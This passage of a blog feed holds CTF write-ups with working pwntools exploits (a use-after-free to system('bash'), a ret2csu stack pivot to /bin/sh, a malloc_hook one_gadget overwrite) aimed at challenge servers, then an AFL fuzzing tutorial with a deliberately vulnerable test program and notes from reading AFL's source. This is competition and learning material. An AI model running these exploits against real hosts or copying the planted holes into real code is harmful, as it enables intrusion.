class="keyword">for</span> i4 <span class="keyword">in</span> num4:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">if</span> (i4[i] == i1[i] <span class="keyword">or</span> i4[i] == i2[i] <span class="keyword">or</span> i4[i] == i3[i]):</span><br><span class="line"> flag = <span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">for</span> i5 <span class="keyword">in</span> num5:</span><br><span class="line"> <span class="keyword">if</span> (i4[<span class="number">1</span>] >= i5[<span class="number">1</span>] <span class="keyword">or</span> i4[<span class="number">4</span>] >= i5[<span class="number">4</span>]):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> <span class="keyword">if</span> (i5[i] == i1[i] <span class="keyword">or</span> i5[i] == i2[i] <span class="keyword">or</span> i5[i] == i3[i] <span class="keyword">or</span> i5[i] == i4[i]):</span><br><span class="line"> flag = <span class="number">1</span></span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="number">1</span>):</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span 
class="built_in">print</span>(<span class="string">'========================'</span>)</span><br><span class="line"> <span class="built_in">print</span>(i1)</span><br><span class="line"> <span class="built_in">print</span>(i2)</span><br><span class="line"> <span class="built_in">print</span>(i3)</span><br><span class="line"> <span class="built_in">print</span>(i4)</span><br><span class="line"> <span class="built_in">print</span>(i5)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'========================'</span>)</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>[1, 4, 2, 5, 3]<br>[5, 3, 1, 4, 2]<br>[3, 5, 4, 2, 1]<br>[2, 1, 5, 3, 4]<br>[4, 2, 3, 1, 5]</p>
<p>fill_number will check</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">map</span><br><span class="line">00000</span><br><span class="line">00000</span><br><span class="line">04400</span><br><span class="line">00030</span><br><span class="line">00010</span><br></pre></td></tr></table></figure>
<p>Finally, md5(1425353142350212150442315,32) = 8a04b4597ad08b83211d3adfa1f61431</p>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>CISCN_2019</title>
<url>/article/CISCN_2019/</url>
<content><![CDATA[<h1 id="CISCN-2019"><a href="#CISCN-2019" class="headerlink" title="CISCN_2019"></a>CISCN_2019</h1><span id="more"></span>
<h1 id="ciscn-2019-n-3"><a href="#ciscn-2019-n-3" class="headerlink" title="ciscn_2019_n_3"></a>ciscn_2019_n_3</h1><p>Protections</p>
<p><img src="/article/CISCN_2019/image-20210526120532732.png" alt="image-20210526120532732"></p>
<p>IDA</p>
<ul>
<li>new</li>
</ul>
<p><img src="/article/CISCN_2019/image-20210526121417172.png" alt="image-20210526121417172"></p>
<ul>
<li><p>del</p>
<p><img src="/article/CISCN_2019/image-20210526121954287.png" alt="image-20210526121954287"></p>
</li>
<li><p>dump</p>
<p><img src="/article/CISCN_2019/image-20210526122032820.png" alt="image-20210526122032820"></p>
</li>
</ul>
<h2 id="解题思路:"><a href="#解题思路:" class="headerlink" title="解题思路:"></a>Solution approach:</h2><p>A UAF vulnerability. Before creating a note, the program first mallocs a 0xC-byte chunk that holds the print and free function pointers</p>
<ul>
<li>1. Write a numeric value directly</li>
<li>2. Write a pointer to a chunk that holds the string</li>
</ul>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">add(<span class="number">0</span>,<span class="number">2</span>,<span class="string">'aaaa'</span>,<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">1</span>,<span class="string">''</span>,<span class="number">0x10</span>)</span><br></pre></td></tr></table></figure>
<p><img src="/article/CISCN_2019/image-20210526123328831.png" alt="image-20210526123328831"></p>
<p>Because of the fastbin's FILO (last-in, first-out) behaviour, after free(0) and free(1) a newly created string-type note is served from the freed 0xC chunk, which lets us overwrite the free pointer with system_plt. At the same time the last byte of the string pointer is overwritten with \n (0x0a), which happens to point exactly at the print pointer's slot, so that slot is filled with bash. Calling free(0) then runs system('bash') and gets a shell</p>
<p><img src="/article/CISCN_2019/image-20210526124650393.png" alt="image-20210526124650393"></p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process('./ciscn_2019_n_3')</span></span><br><span class="line">p = remote(<span class="string">'node3.buuoj.cn'</span>,<span class="number">26908</span>)</span><br><span class="line"><span class="comment">#p = remote('127.0.0.1',12345)</span></span><br><span class="line">elf = ELF(<span class="string">'./ciscn_2019_n_3'</span>)</span><br><span class="line"></span><br><span class="line">sys_addr = elf.plt[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,<span class="type">Type</span>,content,length=<span class="number">0</span></span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'CNote > '</span>,<span class="string">'1'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"> p.sendlineafter(<span class="string">'Type > '</span>,<span class="built_in">str</span>(<span class="type">Type</span>))</span><br><span class="line"> <span class="keyword">if</span> <span class="type">Type</span> == <span class="number">2</span>: </span><br><span class="line"> 
p.sendlineafter(<span class="string">'Length > '</span>,<span class="built_in">str</span>(length))</span><br><span class="line"> p.sendlineafter(<span class="string">'Value > '</span>,content)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> p.sendlineafter(<span class="string">'Value > '</span>,<span class="built_in">str</span>(length))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'CNote > '</span>,<span class="string">'2'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'CNote > '</span>,<span class="string">'3'</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index > '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">2</span>,<span class="string">'bbbb'</span>,<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">1</span>,<span class="string">'a'</span>,<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">2</span>,<span class="number">2</span>,<span class="string">'bash'</span>+p32(sys_addr),<span class="number">0xc</span>)</span><br><span 
class="line"></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>DASCTF2022.3</title>
<url>/article/DASCTF2022.3/</url>
<content><![CDATA[<h1 id="DASCTF2022-3"><a href="#DASCTF2022-3" class="headerlink" title="DASCTF2022.3"></a>DASCTF2022.3</h1>
<h1 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h1><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'checkin'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">25323</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf 
= ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">fake_stack = <span class="number">0x404500</span></span><br><span class="line">main_read = <span class="number">0x0000000004011BF</span></span><br><span class="line">leave = <span class="number">0x00000000004011E2</span></span><br><span class="line">read_got = <span class="number">0x404018</span></span><br><span class="line">csu_begin = <span class="number">0x040124A</span></span><br><span class="line">main = <span class="number">0x000000000401156</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">csu</span>(<span class="params">function,rdi,rsi,rdx</span>):</span></span><br><span class="line"> payload = p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(rdi) + p64(rsi) + p64(rdx) + p64(function)</span><br><span class="line"> payload += p64(<span class="number">0x401230</span>) + p64(<span class="number">0</span>)*<span class="number">7</span></span><br><span class="line"> <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,'b *0x0000000004011CB')</span></span><br><span class="line"><span class="comment"># gdb.attach(p,'b *0x401239\nc\n')</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0xa0</span> + p64(fake_stack+<span class="number">0xa0</span>) + p64(main_read)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">payload = p64(csu_begin)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,read_got,<span class="number">2</span>) + p64(main)</span><br><span 
class="line">payload = payload.ljust(<span class="number">0xa0</span>,<span class="string">'\x00'</span>)</span><br><span class="line">payload += p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">p.send(<span class="string">'\x00\x40'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 2</span></span><br><span class="line">bin_sh = <span class="number">0x404800</span></span><br><span class="line">fake_stack += <span class="number">0x200</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0xa0</span> + p64(fake_stack+<span class="number">0xa0</span>) + p64(main_read)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">payload = p64(csu_begin)</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(<span class="number">0</span>) + p64(fake_stack+<span class="number">0x100</span>) + p64(<span class="number">0x3B</span>) + p64(read_got) + p64(<span class="number">0x0401230</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">2</span> + p64(<span class="number">1</span>) + p64(bin_sh) + p64(<span class="number">0</span>)*<span class="number">2</span> + p64(read_got) + p64(<span class="number">0x0401230</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>,<span class="string">'\x00'</span>)</span><br><span class="line">payload += p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">0.1</span>)</span><br><span class="line">payload = <span 
class="string">'/bin/sh\x00'</span>.ljust(<span class="number">0x3b</span>,<span class="string">'a'</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp/笔记</category>
</categories>
</entry>
<entry>
<title>DASCTF_2021_3</title>
<url>/article/DASCTF_2021_3/</url>
<content><![CDATA[<h1 id="DASCTF-2021-3"><a href="#DASCTF-2021-3" class="headerlink" title="DASCTF_2021_3"></a>DASCTF_2021_3</h1><span id="more"></span>
<h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="fruitpie"><a href="#fruitpie" class="headerlink" title="fruitpie"></a>fruitpie</h2><p>All protections enabled</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">[*] '/home/trick/Desktop/fruitpie'</span><br><span class="line"> Arch: amd64-64-little</span><br><span class="line"> RELRO: Full RELRO</span><br><span class="line"> Stack: Canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: PIE enabled</span><br></pre></td></tr></table></figure>
<p>IDA</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">size_t</span> size; <span class="comment">// [rsp+4h] [rbp-1Ch]</span></span><br><span class="line"> <span class="keyword">char</span> *v5; <span class="comment">// [rsp+10h] [rbp-10h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> __int64 v6; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line"> v6 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> init(*(_QWORD *)&argc, argv, envp);</span><br><span class="line"> welcome();</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Enter the size to malloc:"</span>);</span><br><span class="line"> LODWORD(size) = readInt(<span class="string">"Enter the size to malloc:"</span>);</span><br><span class="line"> v5 = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>((<span class="keyword">unsigned</span> <span class="keyword">int</span>)size);</span><br><span class="line"> <span class="keyword">if</span> ( !v5 )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Malloc Error"</span>);</span><br><span class="line"> <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%p\n"</span>, v5);</span><br><span class="line"> <span 
class="built_in">puts</span>(<span class="string">"Offset:"</span>);</span><br><span class="line"> _isoc99_scanf(<span class="string">"%llx"</span>, (<span class="keyword">char</span> *)&size + <span class="number">4</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Data:"</span>);</span><br><span class="line"> read(<span class="number">0</span>, &v5[*(<span class="keyword">size_t</span> *)((<span class="keyword">char</span> *)&size + <span class="number">4</span>)], <span class="number">0x10</span>uLL);</span><br><span class="line"> <span class="built_in">malloc</span>(<span class="number">0xA0</span>uLL);</span><br><span class="line"> close(<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>Exploitation approach</p>
<ul>
<li>Obtain libc_base: when a sufficiently large chunk is requested it is served by mmap; the program prints the chunk's address, and that mapping sits directly adjacent to libc at a fixed offset</li>
<li>Write a one_gadget to the realloc_hook address, and write realloc + x to the malloc_hook address to adjust the stack frame; x can be 2, 4, 6, 8 or 9.</li>
</ul>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">"debug"</span></span><br><span class="line"></span><br><span class="line">context.arch=<span class="string">"amd64"</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'183.129.189.60'</span>,<span class="number">10018</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process("./fruitpie")</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'./libc.so.6'</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Enter the size to malloc:'</span>,<span class="string">'99999999'</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'0x'</span>)</span><br><span class="line"></span><br><span class="line">addr = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line"></span><br><span class="line">libc_base = addr + <span class="number">0x5f5eff0</span></span><br><span class="line"></span><br><span class="line">one = [<span class="number">0x4f365</span>,<span class="number">0x4f3c2</span>,<span class="number">0x10a45c</span>]</span><br><span class="line"></span><br><span class="line">malloc_hook = libc_base + libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line"></span><br><span class="line">realloc_hook = malloc_hook - <span class="number">0x8</span></span><br><span class="line"></span><br><span class="line">realloc = libc_base + libc.symbols[<span 
class="string">'realloc'</span>]</span><br><span class="line"></span><br><span class="line">one_gadget = libc_base + one[<span class="number">1</span>] <span class="comment">#0x4f3c2</span></span><br><span class="line"></span><br><span class="line">offset = realloc_hook - addr</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(realloc_hook)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Offset:'</span>,<span class="built_in">hex</span>(offset))</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Data:'</span>,p64(one_gadget) + p64(realloc+<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>FUZZ-AFL</title>
<url>/article/FUZZ-AFL/</url>
<content><![CDATA[<h1 id="FUZZ-AFL"><a href="#FUZZ-AFL" class="headerlink" title="FUZZ-AFL"></a>FUZZ-AFL</h1>
<h1 id="浅试FUZZ-AFL安装与使用"><a href="#浅试FUZZ-AFL安装与使用" class="headerlink" title="浅试FUZZ-AFL安装与使用"></a>A first look at installing and using FUZZ-AFL</h1><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>Installation</h2><p>Download from the official site: <a href="https://lcamtuf.coredump.cx/afl/">https://lcamtuf.coredump.cx/afl/</a></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">make</span><br><span class="line">sudo make install</span><br></pre></td></tr></table></figure>
<p>Verify that the installation succeeded</p>
<p><img src="/article/FUZZ-AFL/image-20220424191446449.png" alt="image-20220424191446449"></p>
<h2 id="使用"><a href="#使用" class="headerlink" title="使用"></a>Usage</h2><p>Create two directories</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">mkdir fuzz_in</span><br><span class="line">mkdir fuzz_out</span><br></pre></td></tr></table></figure>
<p>简单的测试用例</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><signal.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">fun</span><span class="params">(<span class="keyword">char</span> *buf)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span>(buf[<span class="number">0</span>]=<span class="string">'a'</span>&&<span class="built_in">strlen</span>(buf)==<span class="number">5</span>)</span><br><span class="line"> raise(SIGSEGV); <span class="comment">// 如果输入的字符串开头是a,且长度为5,则异常退出</span></span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">char</span> buf[<span class="number">100</span>]={<span class="number">0</span>};</span><br><span class="line"> gets(buf); <span class="comment">//栈溢出漏洞</span></span><br><span class="line"> <span class="built_in">printf</span>(buf); <span class="comment">//格式化字符串漏洞</span></span><br><span class="line"> fun(buf);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h3 id="编译"><a href="#编译" class="headerlink" title="Compile"></a>Compile</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">afl-gcc -g -o <span class="built_in">test</span> test.c</span><br></pre></td></tr></table></figure>
<h3 id="创建数据"><a href="#创建数据" class="headerlink" title="Create seed data"></a>Create seed data</h3><p>Create a file named test in the fuzz_in folder and type some arbitrary data into it</p>
<h3 id="开始FUZZ"><a href="#开始FUZZ" class="headerlink" title="Start fuzzing"></a>Start fuzzing</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">afl-fuzz -i fuzz_in -o fuzz_out ./<span class="built_in">test</span></span><br></pre></td></tr></table></figure>
<p><img src="/article/FUZZ-AFL/image-20220424192447765.png" alt="image-20220424192447765"></p>
<h2 id="分析"><a href="#分析" class="headerlink" title="Analysis"></a>Analysis</h2><p>Find the crash to analyze in the crashes folder under fuzz_out</p>
<p><img src="/article/FUZZ-AFL/image-20220424193216200.png" alt="image-20220424193216200"></p>
<h1 id="FUZZ之源码阅读"><a href="#FUZZ之源码阅读" class="headerlink" title="Fuzzing: reading the source"></a>Fuzzing: reading the source</h1><p>Reading source code really is exhausting.</p>
<h2 id="获取命令行参数"><a href="#获取命令行参数" class="headerlink" title="Getting the command-line arguments"></a>Getting the command-line arguments</h2><p>The options in our argv are scanned with <code>getopt</code>.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">while</span> ((opt = getopt(argc, argv, <span class="string">"+i:o:f:m:t:T:dnCB:S:M:x:Q"</span>)) > <span class="number">0</span>)</span><br></pre></td></tr></table></figure>
<ul>
<li><p>-i: sets the input directory (in_dir).</p>
<ul>
<li>If in_dir = "-", in_place_resume = 1 is set</li>
</ul>
</li>
<li><p>-o: sets the output directory (out_dir).</p>
</li>
<li><p>-M: master sync ID (sync_id), used for parallel fuzzing.</p>
<ul>
<li><code>force_deterministic = 1</code></li>
</ul>
</li>
<li><p>-S: secondary sync ID (sync_id), used for parallel fuzzing.</p>
</li>
<li><p>-f: the location from which the fuzzed program reads its test case.</p>
<ul>
<li>The <code>out_file</code> variable is assigned.</li>
</ul>
</li>
<li><p>-x: sets custom tokens (inputs that tend to trigger bugs, such as boundary values and very large numbers). They are used later for replacement and insertion during mutation.</p>
<ul>
<li>The <code>extras_dir</code> variable is assigned.</li>
</ul>
</li>
<li><p>-t: sets the execution time limit for the program under test.</p>
<ul>
<li>The <code>exec_tmout</code> variable is assigned (%u).</li>
<li>If the value has a "+" suffix, timeout_given = 2; otherwise timeout_given = 1, indicating that a time limit was set.</li>
</ul>
</li>
<li><p>-m: sets the memory limit for the program under test.</p>
<ul>
<li><code>mem_limit_given = 1</code>, indicating that a memory limit was set.</li>
<li>The <code>mem_limit</code> variable is assigned the memory size; the default unit is M, and K, G and T can also be given.</li>
</ul>
</li>
<li><p>-d: skips the deterministic stage of mutation.</p>
<ul>
<li><code>skip_deterministic = 1</code></li>
<li><code>use_splicing = 1</code> (recombine input files)</li>
</ul>
</li>
<li><p>-B: load a bitmap? (rarely used)</p>
<ul>
<li>Roughly: if an interesting test case is found during fuzzing, mutate it without discovering new test cases.</li>
<li>The <code>in_bitmap</code> variable is assigned.</li>
</ul>
</li>
<li><p>-C: use a crashing test case as afl-fuzz's input (crash mode).</p>
<ul>
<li>Quickly produces many crashes that are related to, but slightly different from, the input crash.</li>
<li>The <code>crash_mode</code> variable is assigned.</li>
</ul>
</li>
<li><p>-n: non-instrumented mode (dumb mode).</p>
<ul>
<li>If the environment contains "AFL_DUMB_FORKSRV", <code>dumb_mode = 2</code>; otherwise 1.</li>
</ul>
</li>
<li><p>-T: changes the banner name</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">afl-fuzz -i fuzz_in -o fuzz_out -T aTestOpt-T ./<span class="built_in">test</span></span><br></pre></td></tr></table></figure>
<p>While fuzzing, the banner becomes: american fuzzy lop 2.52b (aTestOpt-T)</p>
<p>Without -T, the default is the program name, i.e. test</p>
</li>
<li><p>-Q: QEMU mode.</p>
<ul>
<li><code>qemu_mode = 1</code></li>
<li>If no memory limit (-m) was set, i.e. (!mem_limit_given), then <code>mem_limit = MEM_LIMIT_QEMU</code>.</li>
</ul>
</li>
<li><p>default: <code>usage(argv[0])</code></p>
<p>Prints the usage message.</p>
</li>
</ul>
<h2 id="setup-signal-handlers"><a href="#setup-signal-handlers" class="headerlink" title="setup_signal_handlers"></a>setup_signal_handlers</h2><p>Registers the necessary signal handlers</p>
<ul>
<li><p>The various ways of stopping</p>
<ul>
<li>If the process receives one of these signals without having arranged to catch it beforehand, it terminates.</li>
<li>SIGHUP (hangup): connection hung up</li>
<li>SIGINT (interrupt): terminal interrupt</li>
<li>SIGTERM (software termination signal from kill): terminate</li>
<li>handle_stop_sig<ul>
<li>Sets stop_soon to 1</li>
<li>If child_pid exists, sends it SIGKILL so that the system kills it</li>
<li>If forksrv_pid exists, sends it SIGKILL</li>
</ul>
</li>
</ul>
</li>
<li><p>Handling timeouts</p>
<ul>
<li>SIGALRM (alarm clock)</li>
<li>handle_timeout<ul>
<li>If child_pid>0, sets child_timed_out to 1 and kills child_pid</li>
<li>If child_pid==-1 and forksrv_pid>0, sets child_timed_out to 1 and kills forksrv_pid</li>
</ul>
</li>
</ul>
</li>
<li><p>Handling window-size changes</p>
<ul>
<li>SIGWINCH (window resize)</li>
<li>handle_resize<ul>
<li>Sets clear_screen=1</li>
</ul>
</li>
</ul>
</li>
<li><p>User-defined signal</p>
<ul>
<li>SIGUSR1 (user defined signal 1)</li>
<li>handle_skipreq<ul>
<li>Sets skip_requested=1</li>
</ul>
</li>
</ul>
</li>
<li><p>Signals we do not care about</p>
<ul>
<li>SIGTSTP (stop signal from tty)</li>
<li>SIGPIPE (write on a pipe with no one to read it)</li>
<li>Set to SIG_IGN (ignore the signal)</li>
</ul>
</li>
</ul>
<h2 id="check-asan-opts"><a href="#check-asan-opts" class="headerlink" title="check_asan_opts"></a>check_asan_opts</h2><p>Reads the environment variables <code>ASAN_OPTIONS</code> and <code>MSAN_OPTIONS</code> and performs some necessary checks</p>
<p>ASAN is a fast memory-error detector</p>
<h2 id="fix-up-sync"><a href="#fix-up-sync" class="headerlink" title="fix_up_sync"></a>fix_up_sync</h2><p>Checks for some conflicting options.</p>
<ul>
<li><p>If -M or -S was given among the options, sync_id has been changed and this function is entered</p>
<ul>
<li><code>sync_dir = out_dir</code></li>
<li><code>out_dir = out_dir/sync_id</code></li>
</ul>
</li>
<li><p>If -M was not given</p>
<ul>
<li>Equivalent to passing -d</li>
<li><code>skip_deterministic = 1</code>. Skip the deterministic stage</li>
<li><code>use_splicing = 1</code>. Recombine input files</li>
</ul>
</li>
</ul>
<h2 id="save-cmdline"><a href="#save-cmdline" class="headerlink" title="save_cmdline"></a>save_cmdline</h2><p>Saves the command-line arguments in the global variable <code>orig_cmdline</code></p>
<h2 id="fix-up-banner"><a href="#fix-up-banner" class="headerlink" title="fix_up_banner"></a>fix_up_banner</h2><p>Trims and creates the run banner. Related to the -T option</p>
<h2 id="check-if-tty"><a href="#check-if-tty" class="headerlink" title="check_if_tty"></a>check_if_tty</h2><p>Checks whether we are running on a tty terminal</p>
<ul>
<li>Checks whether the environment variable AFL_NO_UI exists; if so, <code>not_on_tty = 1</code></li>
<li>Reads the window size with <code>ioctl(1, TIOCGWINSZ, &ws)</code>; if this fails with ENOTTY, we are not running on a tty terminal, so <code>not_on_tty = 1</code></li>
</ul>
<h2 id="get-core-count"><a href="#get-core-count" class="headerlink" title="get_core_count"></a>get_core_count</h2><p>Gets the number of CPU cores and stores it in the global variable <code>cpu_core_count</code></p>
<h2 id="bind-to-free-cpu"><a href="#bind-to-free-cpu" class="headerlink" title="bind_to_free_cpu"></a>bind_to_free_cpu</h2><p>Builds the list of processes bound to specific cores</p>
<h2 id="check-crash-handling"><a href="#check-crash-handling" class="headerlink" title="check_crash_handling"></a>check_crash_handling</h2><p>If the system is configured to send core dump (core) notifications to an external program, the delay before crash information reaches the fuzzer grows, and crashes may then be misreported as timeouts, so the core_pattern file has to be changed temporarily</p>
<p>This function is why the first run fails and tells you to execute that command (echo core > /proc/sys/kernel/core_pattern)</p>
<h2 id="check-cpu-governor"><a href="#check-cpu-governor" class="headerlink" title="check_cpu_governor"></a>check_cpu_governor</h2><p>Checks the CPU governor</p>
<h2 id="setup-post"><a href="#setup-post" class="headerlink" title="setup_post"></a>setup_post</h2><p>Loads the post-processor</p>
